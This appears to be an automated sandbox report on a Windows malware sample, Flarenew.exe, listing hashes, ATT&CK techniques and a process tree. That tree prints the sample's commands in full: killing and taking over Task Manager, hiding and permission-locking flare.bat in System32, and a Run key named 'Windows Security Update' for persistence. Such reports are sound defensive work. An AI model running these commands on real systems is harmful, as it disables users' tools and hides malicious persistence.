d5f2027511bc056ca92ef08e24545a0374f7c0b6f7e6f629731ac57d99d54989

Analysis

max time kernel
119s
max time network
145s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
26/03/2025, 15:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Flarenew.exe
Size

91KB
MD5

218b70372eba69f8c85c2c22d5c3256e
SHA1

e77a0b4c000811ad7e733f781b9dc6fc83d6de33
SHA256

d5f2027511bc056ca92ef08e24545a0374f7c0b6f7e6f629731ac57d99d54989
SHA512

d230d49653bd8d5d87a55121628e33dbdc56037014ff1c5024c33a9ebfa1c672c0cc4adeef0ebf55b533b18e5d1f7b7d4c149308c38499ca267c1e0e4608ee65
SSDEEP

1536:j7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfnw93Od:/7DhdC6kzWypvaQ0FxyNTBfnaW

Score

8^/10

defense_evasion discovery exploit persistence

Malware Config

Signatures

Possible privilege escalation attempt 7 IoCs

exploit

pid	Process
3836	icacls.exe
4588	takeown.exe
4740	takeown.exe
184	icacls.exe
4824	icacls.exe
1464	icacls.exe
2920	icacls.exe

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4272	attrib.exe

Modifies file permissions 1 TTPs 7 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4588	takeown.exe
4740	takeown.exe
184	icacls.exe
4824	icacls.exe
1464	icacls.exe
2920	icacls.exe
3836	icacls.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Security Update = "C:\\Windows\\System32\\flare.bat"	reg.exe

Drops file in System32 directory 5 IoCs

description	ioc	Process
File created	C:\Windows\System32\flare.bat	cmd.exe
File opened for modification	C:\Windows\System32\flare.bat	cmd.exe
File opened for modification	C:\Windows\System32\flare.bat	attrib.exe
File created	C:\Windows\System32\flare_helper.bat	cmd.exe
File opened for modification	C:\Windows\System32\flare_helper.bat	cmd.exe

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Flarenew.exe

Kills process with taskkill 1 IoCs

defense_evasion

pid	Process
4980	taskkill.exe

Runs net.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4980	taskkill.exe
Token: SeTakeOwnershipPrivilege	4588	takeown.exe
Token: SeTakeOwnershipPrivilege	4740	takeown.exe

Suspicious use of WriteProcessMemory 30 IoCs

description	pid	Process	procid_target
PID 4248 wrote to memory of 4080	4248	Flarenew.exe	88
PID 4248 wrote to memory of 4080	4248	Flarenew.exe	88
PID 4080 wrote to memory of 4104	4080	cmd.exe	89
PID 4080 wrote to memory of 4104	4080	cmd.exe	89
PID 4080 wrote to memory of 3980	4080	cmd.exe	90
PID 4080 wrote to memory of 3980	4080	cmd.exe	90
PID 3980 wrote to memory of 3676	3980	net.exe	91
PID 3980 wrote to memory of 3676	3980	net.exe	91
PID 4080 wrote to memory of 4980	4080	cmd.exe	92
PID 4080 wrote to memory of 4980	4080	cmd.exe	92
PID 4080 wrote to memory of 4588	4080	cmd.exe	94
PID 4080 wrote to memory of 4588	4080	cmd.exe	94
PID 4080 wrote to memory of 4740	4080	cmd.exe	95
PID 4080 wrote to memory of 4740	4080	cmd.exe	95
PID 4080 wrote to memory of 184	4080	cmd.exe	96
PID 4080 wrote to memory of 184	4080	cmd.exe	96
PID 4080 wrote to memory of 4824	4080	cmd.exe	97
PID 4080 wrote to memory of 4824	4080	cmd.exe	97
PID 4080 wrote to memory of 4272	4080	cmd.exe	98
PID 4080 wrote to memory of 4272	4080	cmd.exe	98
PID 4080 wrote to memory of 1464	4080	cmd.exe	99
PID 4080 wrote to memory of 1464	4080	cmd.exe	99
PID 4080 wrote to memory of 2920	4080	cmd.exe	100
PID 4080 wrote to memory of 2920	4080	cmd.exe	100
PID 4080 wrote to memory of 3836	4080	cmd.exe	101
PID 4080 wrote to memory of 3836	4080	cmd.exe	101
PID 4080 wrote to memory of 2400	4080	cmd.exe	102
PID 4080 wrote to memory of 2400	4080	cmd.exe	102
PID 4080 wrote to memory of 1936	4080	cmd.exe	103
PID 4080 wrote to memory of 1936	4080	cmd.exe	103

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4272	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Flarenew.exe
"C:\Users\Admin\AppData\Local\Temp\Flarenew.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4248
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A364.tmp\A365.tmp\A366.bat C:\Users\Admin\AppData\Local\Temp\Flarenew.exe"
  2⤵
  - Drops file in System32 directory
  - Suspicious use of WriteProcessMemory
  PID:4080
- - C:\Windows\system32\msg.exe
    msg * "Fatal Error: Something unusual has occured. Maybe try restarting your PC?"
    3⤵
    PID:4104
- - C:\Windows\system32\net.exe
    net session
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3980
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 session
      4⤵
      PID:3676
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im taskmgr.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4980
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\taskmgr.exe
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4588
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\SysWOW64\taskmgr.exe
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4740
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\taskmgr.exe /grant administrators:F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:184
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\SysWOW64\taskmgr.exe /grant administrators:F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4824
- - C:\Windows\system32\attrib.exe
    attrib +s +h +r "C:\Windows\System32\flare.bat"
    3⤵
    - Sets file to hidden
    - Drops file in System32 directory
    - Views/modifies file attributes
    PID:4272
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\flare.bat" /deny Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1464
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\flare.bat" /deny SYSTEM:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2920
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\flare.bat" /deny Administrators:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3836
- - C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security Update" /t REG_SZ /d "C:\Windows\System32\flare.bat" /f
    3⤵
    - Adds Run key to start application
    PID:2400
- - C:\Windows\system32\cmd.exe
    cmd.exe
    3⤵
    PID:1936

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\A364.tmp\A365.tmp\A366.bat

Filesize
2KB

MD5
107ab7d4494af660efb2645602db0a79

SHA1
6a9142a004d190a65afd04fd2bdd8fb289e923e4

SHA256
a364b9fdb71918886055b624389916766035c8ce41e1b74013cb63bb36cfb165

SHA512
2fbf35bd9d33443d4eb8ed92160e4f53a0714eea27c19db7c4a89ade9af83bb018456139d675a09e7f0773485185742180a91722fe23fce2195fe2d3398752fa

Download Submit
C:\Windows\System32\flare.bat

Filesize
91KB

MD5
218b70372eba69f8c85c2c22d5c3256e

SHA1
e77a0b4c000811ad7e733f781b9dc6fc83d6de33

SHA256
d5f2027511bc056ca92ef08e24545a0374f7c0b6f7e6f629731ac57d99d54989

SHA512
d230d49653bd8d5d87a55121628e33dbdc56037014ff1c5024c33a9ebfa1c672c0cc4adeef0ebf55b533b18e5d1f7b7d4c149308c38499ca267c1e0e4608ee65

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads